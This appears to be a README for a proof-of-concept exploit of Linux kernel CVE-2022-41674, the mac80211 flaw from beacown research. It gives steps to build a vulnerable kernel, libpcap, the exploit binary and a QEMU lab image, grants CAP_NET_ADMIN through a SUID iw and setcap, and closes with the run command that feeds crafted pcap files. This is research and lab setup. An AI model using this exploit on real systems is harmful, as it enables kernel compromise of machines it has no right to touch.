Extension of beacown research.
Complete proof-of-concept exploit for CVE-2022-41674 targeting the Linux kernel v5.12-rc4 and v5.14.
To run the exploit against a target system, you will need to build:
- Linux kernel.
- Exploit binary.
- QEMU disk image.
The instructions below have been tested on a WSL2 Ubuntu 20.04 host system.
Install system dependencies on a host system that will compile the kernel:
# apt install libelf-dev libssl-dev -yClone and build the linux kernel with target configuration:
$ git clone --branch v5.12-rc4 git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git
$ cp .config linux
$ cd linux
$ make -j `nproc`
Install system dependencies for compiling xpl.c.
# apt install libnl-3-200
# apt install libnl-genl-3-devxpl.c relies on libpcap version 1.10.1+ so we will need to compile libpcap from source.
$ git clone https://github.com/the-tcpdump-group/libpcap.git
$ git checkout libpcap-1.10.1
$ ./configure
$ make
$ make installCopy the libpcap library to the system library load path:
# cp ./libpcap.so.1.10.1 /usr/lib/x86_64-linux-gnu/ && ln -s /usr/lib/x86_64-linux-gnu/libpcap.so.1.10.1 /usr/lib/x86_64-linux-gnu/libpcap.so.1Compile the xpl binary file:
$ gcc -o xpl xpl.c $(pkg-config --cflags --libs libnl-3.0 libnl-genl-3.0 libpcap)A modified version of the syzkaller ./create-image.sh script is used to prepare the target system and copy the xpl binary and associated poc.pcap files.
Simply run ./create-image.sh as sudo and a stretch.img output file will be produced that is used by the ./run.sh script.
The target kernel and system can be run using the ./run.sh script.
Ensure the path to the compiled kernel bzImage file is correct for your local host system.
You'll need to build the kernel with CONFIG_MAC80211_HWSIM enabled
CAP_NET_ADMIN is required. We artificially introduce this permission in ./create-image.sh by setting /sbin/iw as root SUID and /xpl with setcap.
$ /sbin/iw wlan0 scan trigger && /xpl /poc.pcap /poc2.pcap